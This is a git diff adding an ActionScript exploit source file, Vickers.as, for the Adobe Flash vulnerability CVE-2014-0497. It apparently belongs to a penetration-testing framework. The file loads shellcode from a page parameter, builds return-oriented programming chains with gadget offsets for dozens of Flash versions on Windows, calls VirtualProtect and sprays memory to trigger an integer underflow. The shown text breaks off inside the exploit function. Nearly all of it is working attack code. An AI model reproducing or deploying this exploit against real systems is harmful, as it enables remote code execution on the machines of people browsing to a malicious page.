HcmV?d00001 diff --git a/external/source/exploits/CVE-2014-0497/Vickers.as b/external/source/exploits/CVE-2014-0497/Vickers.as new file mode 100755 index 0000000000..02db79f39e --- /dev/null +++ b/external/source/exploits/CVE-2014-0497/Vickers.as 
@@ -0,0 +1,797 @@ +//Compile with mxmlc Vickers.as -o Vickers.swf +package +{ + import flash.display.Sprite; + import flash.system.Capabilities; + import flash.utils.ByteArray; + import __AS3__.vec.Vector; + import flash.system.ApplicationDomain; + import avm2.intrinsics.memory.*; + + public class Vickers extends Sprite + { + + public static var shellcode:String; + + public function Vickers() + { + var params = root.loaderInfo.parameters; + shellcode = params["id"]; + while (true) + { + if (exploit()) break; + }; + } + + public function makePayload(vftableAddr:*, scAddr:*):ByteArray + { + var payload = null; + switch (Capabilities.os.toLowerCase()) + { + case "windows xp": + case "windows vista": + case "windows server 2003 r2": + case "windows server 2003": + case "windows 7": + case "windows 7 x64": + case "windows server 2008 r2": + case "windows server 2008": + payload = makePayloadWinOther(vftableAddr, scAddr); + break; + case "windows 8": + case "windows 8 x64": + payload = makePayloadWin8(vftableAddr, scAddr); + break; + default: + return (null); + }; + return (payload); + } + + public function makePayloadWin8(vftableAddr:*, scAddr:*):ByteArray + { + var flash_base:uint = vftableAddr; + var flash_end:uint; + var rop_payload:ByteArray = new ByteArray(); + rop_payload.position = 0; + rop_payload.endian = "littleEndian"; + rop_payload.writeUnsignedInt((scAddr + 4)); + switch (Capabilities.version.toLowerCase()) + { + case "win 11,3,372,94": + flash_base = (flash_base - 9518744); + flash_end = (flash_base + 0xB10000); + rop_payload.writeUnsignedInt((flash_base + 0x401404)); // add esp, 0x44; ret + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 0x26525)); // xchg eax, esp; ret + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 0x10c5)); // pop eax; ret + rop_payload.writeUnsignedInt((flash_base + 0x817420)); // ptr to KERNEL32!VirtualProtectStub + rop_payload.writeUnsignedInt((flash_base + 0x9e16)); // mov eax, 
dword ptr [eax]; ret + rop_payload.writeUnsignedInt((flash_base + 0xcc022)); // push eax; ret + rop_payload.writeUnsignedInt((flash_base + 0x3157c)); // jmp esp ; ret after VirtualProtect + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(0x40); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,375,10": + flash_base = (flash_base - 9589392); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220004)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 142215)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 40214)); + rop_payload.writeUnsignedInt((flash_base + 840082)); + rop_payload.writeUnsignedInt((flash_base + 202134)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,376,12": + flash_base = (flash_base - 9593552); + flash_end = (flash_base + 0xB16000); + rop_payload.writeUnsignedInt((flash_base + 4220740)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 142023)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8508448)); + rop_payload.writeUnsignedInt((flash_base + 39878)); + rop_payload.writeUnsignedInt((flash_base + 839538)); + rop_payload.writeUnsignedInt((flash_base + 201958)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,377,15": + flash_base = (flash_base - 9589576); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220388)); + rop_payload.position = 64; + 
rop_payload.writeUnsignedInt((flash_base + 141671)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 39526)); + rop_payload.writeUnsignedInt((flash_base + 839698)); + rop_payload.writeUnsignedInt((flash_base + 201590)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,378,5": + flash_base = (flash_base - 9589448); + flash_end = (flash_base + 0xB15000); + rop_payload.writeUnsignedInt((flash_base + 4220388)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 141671)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8504352)); + rop_payload.writeUnsignedInt((flash_base + 39526)); + rop_payload.writeUnsignedInt((flash_base + 839698)); + rop_payload.writeUnsignedInt((flash_base + 201590)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,379,14": + flash_base = (flash_base - 9597856); + flash_end = (flash_base + 0xB17000); + rop_payload.writeUnsignedInt((flash_base + 4575113)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 6617808)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 8149060)); + rop_payload.writeUnsignedInt((flash_base + 8512544)); + rop_payload.writeUnsignedInt((flash_base + 4907562)); + rop_payload.writeUnsignedInt((flash_base + 8147977)); + rop_payload.writeUnsignedInt((flash_base + 4046601)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,167": + 
flash_base = (flash_base - 9821704); + flash_end = (flash_base + 0xB85000); + rop_payload.writeUnsignedInt((flash_base + 8405950)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 27456)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8791088)); + rop_payload.writeUnsignedInt((flash_base + 73494)); + rop_payload.writeUnsignedInt((flash_base + 1115794)); + rop_payload.writeUnsignedInt((flash_base + 242790)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,171": + flash_base = (flash_base - 9821904); + flash_end = (flash_base + 0xB85000); + rop_payload.writeUnsignedInt((flash_base + 8406414)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 27456)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8791088)); + rop_payload.writeUnsignedInt((flash_base + 73078)); + rop_payload.writeUnsignedInt((flash_base + 1116754)); + rop_payload.writeUnsignedInt((flash_base + 242380)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,180": + flash_base = (flash_base - 9816600); + flash_end = (flash_base + 0xB84000); + rop_payload.writeUnsignedInt((flash_base + 8404478)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 29514)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 8786992)); + rop_payload.writeUnsignedInt((flash_base + 69382)); + rop_payload.writeUnsignedInt((flash_base + 175197)); + rop_payload.writeUnsignedInt((flash_base + 238732)); + rop_payload.writeUnsignedInt(scAddr); + 
rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,169": + flash_base = (flash_base - 10441412); + flash_end = (flash_base + 0xC45000); + rop_payload.writeUnsignedInt((flash_base + 4640769)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 53338)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 9368732)); + rop_payload.writeUnsignedInt((flash_base + 95414)); + rop_payload.writeUnsignedInt((flash_base + 1145506)); + rop_payload.writeUnsignedInt((flash_base + 2156132)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,202": + flash_base = (flash_base - 0x9f5470); + flash_end = (flash_base + 0xC45000); + rop_payload.writeUnsignedInt((flash_base + 0x46c361)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 0xcc5a)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 0x10c5)); + rop_payload.writeUnsignedInt((flash_base + 0x8ef49c)); + rop_payload.writeUnsignedInt((flash_base + 0x17136)); + rop_payload.writeUnsignedInt((flash_base + 0x42f0)); + rop_payload.writeUnsignedInt((flash_base + 0x40664)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,224": + flash_base = (flash_base - 10450228); + flash_end = (flash_base + 0xC7A000); + rop_payload.writeUnsignedInt((flash_base + 4646881)); + rop_payload.position = 64; + rop_payload.writeUnsignedInt((flash_base + 52090)); + rop_payload.position = 76; + rop_payload.writeUnsignedInt((flash_base + 4293)); + rop_payload.writeUnsignedInt((flash_base + 9376924)); + 
rop_payload.writeUnsignedInt((flash_base + 93510)); + rop_payload.writeUnsignedInt((flash_base + 1145378)); + rop_payload.writeUnsignedInt((flash_base + 1909483)); + rop_payload.writeUnsignedInt(scAddr); + rop_payload.writeUnsignedInt(0x1000); + rop_payload.writeUnsignedInt(64); + rop_payload.writeUnsignedInt((scAddr - 4)); + break; + default: + return (null); + }; + return (rop_payload); + } + + public function makePayloadWinOther(vftableAddr:*, scAddr:*):ByteArray + { + var vftableAddr_copy:uint = vftableAddr; + var _local_5:uint; + var payload:ByteArray = new ByteArray(); + payload.position = 0; + payload.endian = "littleEndian"; + payload.writeUnsignedInt((scAddr + 4)); + switch (Capabilities.version.toLowerCase()) + { + case "win 11,0,1,152": + vftableAddr_copy = (vftableAddr_copy - 7628676); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 1041567)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1937003)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 4585805)); + payload.writeUnsignedInt((vftableAddr_copy + 6697912)); + payload.writeUnsignedInt((vftableAddr_copy + 2201532)); + payload.writeUnsignedInt((vftableAddr_copy + 3985044)); + payload.writeUnsignedInt((vftableAddr_copy + 2764856)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,55": + vftableAddr_copy = (vftableAddr_copy - 7633040); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4793772)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939267)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 2297101)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 3976335)); + 
payload.writeUnsignedInt((vftableAddr_copy + 3516263)); + payload.writeUnsignedInt((vftableAddr_copy + 2768033)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,62": + vftableAddr_copy = (vftableAddr_copy - 7628912); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4794156)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939856)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5126527)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 2920469)); + payload.writeUnsignedInt((vftableAddr_copy + 4454837)); + payload.writeUnsignedInt((vftableAddr_copy + 2768325)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,1,102,63": + vftableAddr_copy = (vftableAddr_copy - 7628904); + _local_5 = (vftableAddr_copy + 0x927000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4794076)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1939822)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5126435)); + payload.writeUnsignedInt((vftableAddr_copy + 6702008)); + payload.writeUnsignedInt((vftableAddr_copy + 2353542)); + payload.writeUnsignedInt((vftableAddr_copy + 3516455)); + payload.writeUnsignedInt((vftableAddr_copy + 2768305)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,228": + vftableAddr_copy = (vftableAddr_copy - 7726032); + _local_5 = (vftableAddr_copy + 0x93F000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947482)); + 
payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022234)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6255948)); + payload.writeUnsignedInt((vftableAddr_copy + 6824832)); + payload.writeUnsignedInt((vftableAddr_copy + 5021261)); + payload.writeUnsignedInt((vftableAddr_copy + 6176368)); + payload.writeUnsignedInt((vftableAddr_copy + 2847152)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,233": + vftableAddr_copy = (vftableAddr_copy - 7729872); + _local_5 = (vftableAddr_copy + 0x93F000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947594)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022508)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 4691374)); + payload.writeUnsignedInt((vftableAddr_copy + 6824832)); + payload.writeUnsignedInt((vftableAddr_copy + 4164715)); + payload.writeUnsignedInt((vftableAddr_copy + 5837496)); + payload.writeUnsignedInt((vftableAddr_copy + 2847021)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,2,202,235": + vftableAddr_copy = (vftableAddr_copy - 7734032); + _local_5 = (vftableAddr_copy + 0x940000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 4947578)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2022729)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 5249755)); + payload.writeUnsignedInt((vftableAddr_copy + 6828928)); + payload.writeUnsignedInt((vftableAddr_copy + 4261382)); + payload.writeUnsignedInt((vftableAddr_copy + 4553024)); + payload.writeUnsignedInt((vftableAddr_copy + 2847456)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + 
payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,300,257": + vftableAddr_copy = (vftableAddr_copy - 8232016); + _local_5 = (vftableAddr_copy + 0x9C3000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 5328586)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2069614)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6497300)); + payload.writeUnsignedInt((vftableAddr_copy + 7222148)); + payload.writeUnsignedInt((vftableAddr_copy + 5022322)); + payload.writeUnsignedInt((vftableAddr_copy + 4972967)); + payload.writeUnsignedInt((vftableAddr_copy + 3071572)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,3,300,273": + vftableAddr_copy = (vftableAddr_copy - 8236216); + _local_5 = (vftableAddr_copy + 0x9C4000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 5331930)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2070667)); + payload.position = 80; + payload.writeUnsignedInt((vftableAddr_copy + 6500737)); + payload.writeUnsignedInt((vftableAddr_copy + 7226252)); + payload.writeUnsignedInt((vftableAddr_copy + 5142060)); + payload.writeUnsignedInt((vftableAddr_copy + 5127634)); + payload.writeUnsignedInt((vftableAddr_copy + 3074828)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,4,402,278": + vftableAddr_copy = (vftableAddr_copy - 8503560); + _local_5 = (vftableAddr_copy + 0xA23000); + payload.writeUnsignedInt((vftableAddr_copy + 5581452)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1202409)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 6927402)); + payload.writeUnsignedInt((vftableAddr_copy + 7480208)); 
+ payload.writeUnsignedInt((vftableAddr_copy + 5373116)); + payload.writeUnsignedInt((vftableAddr_copy + 5713520)); + payload.writeUnsignedInt((vftableAddr_copy + 3269652)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,4,402,287": + vftableAddr_copy = (vftableAddr_copy - 8507728); + _local_5 = (vftableAddr_copy + 0xA24000); + payload.writeUnsignedInt((vftableAddr_copy + 5582348)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 1202841)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 6927143)); + payload.writeUnsignedInt((vftableAddr_copy + 7484304)); + payload.writeUnsignedInt((vftableAddr_copy + 5481024)); + payload.writeUnsignedInt((vftableAddr_copy + 5107604)); + payload.writeUnsignedInt((vftableAddr_copy + 5747979)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,110": + vftableAddr_copy = (vftableAddr_copy - 11716376); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.position = 20; + payload.writeUnsignedInt((vftableAddr_copy + 9813154)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 448623)); + payload.position = 96; + payload.writeUnsignedInt((vftableAddr_copy + 9326463)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 5731300)); + payload.writeUnsignedInt((vftableAddr_copy + 8910259)); + payload.writeUnsignedInt((vftableAddr_copy + 8630687)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,135": + vftableAddr_copy = (vftableAddr_copy - 11716400); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.writeUnsignedInt((vftableAddr_copy + 
1101327)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4733912)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 4540)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 28862)); + payload.writeUnsignedInt((vftableAddr_copy + 512197)); + payload.writeUnsignedInt((vftableAddr_copy + 1560889)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,146": + vftableAddr_copy = (vftableAddr_copy - 11716320); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.writeUnsignedInt((vftableAddr_copy + 1101327)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4733912)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 4540)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 28862)); + payload.writeUnsignedInt((vftableAddr_copy + 512197)); + payload.writeUnsignedInt((vftableAddr_copy + 1560889)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,5,502,149": + vftableAddr_copy = (vftableAddr_copy - 11712240); + _local_5 = (vftableAddr_copy + 0xEC6000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 10373824)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4331881)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9292830)); + payload.writeUnsignedInt((vftableAddr_copy + 10691852)); + payload.writeUnsignedInt((vftableAddr_copy + 5731956)); + payload.writeUnsignedInt((vftableAddr_copy + 7150772)); + payload.writeUnsignedInt((vftableAddr_copy + 3344264)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + 
payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,168": + vftableAddr_copy = (vftableAddr_copy - 11825816); + _local_5 = (vftableAddr_copy + 0xEE9000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9924439)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4370139)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9564155)); + payload.writeUnsignedInt((vftableAddr_copy + 10736920)); + payload.writeUnsignedInt((vftableAddr_copy + 5830863)); + payload.writeUnsignedInt((vftableAddr_copy + 9044861)); + payload.writeUnsignedInt((vftableAddr_copy + 7984191)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,171": + vftableAddr_copy = (vftableAddr_copy - 11834040); + _local_5 = (vftableAddr_copy + 0xEEA000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9925589)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4370636)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9564442)); + payload.writeUnsignedInt((vftableAddr_copy + 10741016)); + payload.writeUnsignedInt((vftableAddr_copy + 5771380)); + payload.writeUnsignedInt((vftableAddr_copy + 10153408)); + payload.writeUnsignedInt((vftableAddr_copy + 7983199)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,6,602,180": + vftableAddr_copy = (vftableAddr_copy - 11824712); + _local_5 = (vftableAddr_copy + 0xEE9000); + payload.position = 5; + payload.writeUnsignedInt((vftableAddr_copy + 9923173)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 4368414)); + payload.position = 77; + payload.writeUnsignedInt((vftableAddr_copy + 9562061)); + payload.writeUnsignedInt((vftableAddr_copy + 10736920)); + 
payload.writeUnsignedInt((vftableAddr_copy + 5828990)); + payload.writeUnsignedInt((vftableAddr_copy + 9042989)); + payload.writeUnsignedInt((vftableAddr_copy + 8661666)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,169": + vftableAddr_copy = (vftableAddr_copy - 12902952); + _local_5 = (vftableAddr_copy + 16904192); + payload.writeUnsignedInt((vftableAddr_copy + 1116239)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 10368763)); + payload.position = 76; + payload.writeUnsignedInt((vftableAddr_copy + 2586086)); + payload.writeUnsignedInt((vftableAddr_copy + 11752328)); + payload.writeUnsignedInt((vftableAddr_copy + 32732)); + payload.writeUnsignedInt((vftableAddr_copy + 8192266)); + payload.writeUnsignedInt((vftableAddr_copy + 1578904)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,202": + vftableAddr_copy = (vftableAddr_copy - 0xc4f508); + _local_5 = (vftableAddr_copy + 0x101f000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 0x7dfcd2)); // 107dfcd2 : add esp,44h ; ret + payload.position = 0x40; + payload.writeUnsignedInt((vftableAddr_copy + 0x12a269)); // 1012a269 : xchg edx,esp ; add eax,dword ptr [eax]; add byte ptr [edi+5Eh],bl ; pop ecx ; ret + payload.position = 0x50; + payload.writeUnsignedInt((vftableAddr_copy + 0xcb497)); // 100cb497 : pop eax ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0xb35388)); // 10b35388 : ptr to VirtualProtect + payload.writeUnsignedInt((vftableAddr_copy + 0x110d3d)); // 10110d3d : mov eax,dword ptr [eax] ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0x887362)); // 10887362 : push eax ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0x331bff)); // 10331bff : jmp esp + payload.writeUnsignedInt(scAddr); + 
payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(0x40); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,8,800,97": + vftableAddr_copy = (vftableAddr_copy - 129165844); + _local_5 = (vftableAddr_copy + 16904192); + payload.position = 8; + payload.writeUnsignedInt(vftableAddr_copy); + payload.position = 16; + payload.writeUnsignedInt((vftableAddr_copy + 117625919)); + payload.writeUnsignedInt(-1810746282); + payload.writeUnsignedInt((scAddr + 76)); + payload.writeUnsignedInt((vftableAddr_copy + 122565891)); + payload.position = 44; + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 0x0400)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 123362382)); + payload.position = 80; + payload.writeUnsignedInt((scAddr + 192)); + payload.position = 112; + payload.writeUnsignedInt((vftableAddr_copy + 32365)); + payload.writeUnsignedInt((vftableAddr_copy + 11760520)); + payload.writeUnsignedInt((vftableAddr_copy + 1117213)); + payload.writeUnsignedInt((vftableAddr_copy + 3721232)); + payload.writeUnsignedInt((vftableAddr_copy + 8274178)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,8,800,50": + vftableAddr_copy = (vftableAddr_copy - 12936000); + _local_5 = (vftableAddr_copy + 17149952); + payload.writeUnsignedInt((vftableAddr_copy + 404531)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2583617)); + payload.position = 72; + payload.writeUnsignedInt((vftableAddr_copy + 7914140)); + payload.writeUnsignedInt((vftableAddr_copy + 4550)); + payload.writeUnsignedInt((vftableAddr_copy + 11780992)); + payload.writeUnsignedInt((vftableAddr_copy + 32684)); + payload.writeUnsignedInt((vftableAddr_copy + 142358)); + payload.writeUnsignedInt((vftableAddr_copy + 1577816)); + 
payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + default: + return (null); + }; + return (payload); + } + + public function exploit():Boolean + { + var vector_objects_entry_length:int; + var shellcode_byte = null; + var _local_6:uint; + var i:int; + var vftable_addr:uint; + var shellcode_address:uint; + var vector_objects_entry_idx:uint; + var length_vector_byte_arrays:uint; + var vector_byte_arrays:Vector. = new Vector.(0); + var vector_objects:Vector. = new Vector.(0); + var twos_object:Object = new [2, 2, 2, 2, 2, 2, 2, 2]; + var vickers_byte_array:ByteArray = new ByteArray(); + while (i < 0x0500) + { + vector_byte_arrays[i] = new ByteArray(); + vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + i++; + }; + vickers_byte_array.writeUTFBytes("vickers"); + vickers_byte_array.length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + ApplicationDomain.currentDomain.domainMemory = vickers_byte_array; + vector_byte_arrays[i] = new ByteArray(); + vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + length_vector_byte_arrays = i; + i = 0; + while (i < (vector_byte_arrays.length - 1)) + { + vector_byte_arrays[i++] = null; + }; + i = 0; + while (i < 0x8000) + { + vector_objects[i] = new [i, twos_object, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]; + i++; + }; + // _local_6 => nil => 0, makes li32(_local_6 - offset) makes it underflow! 
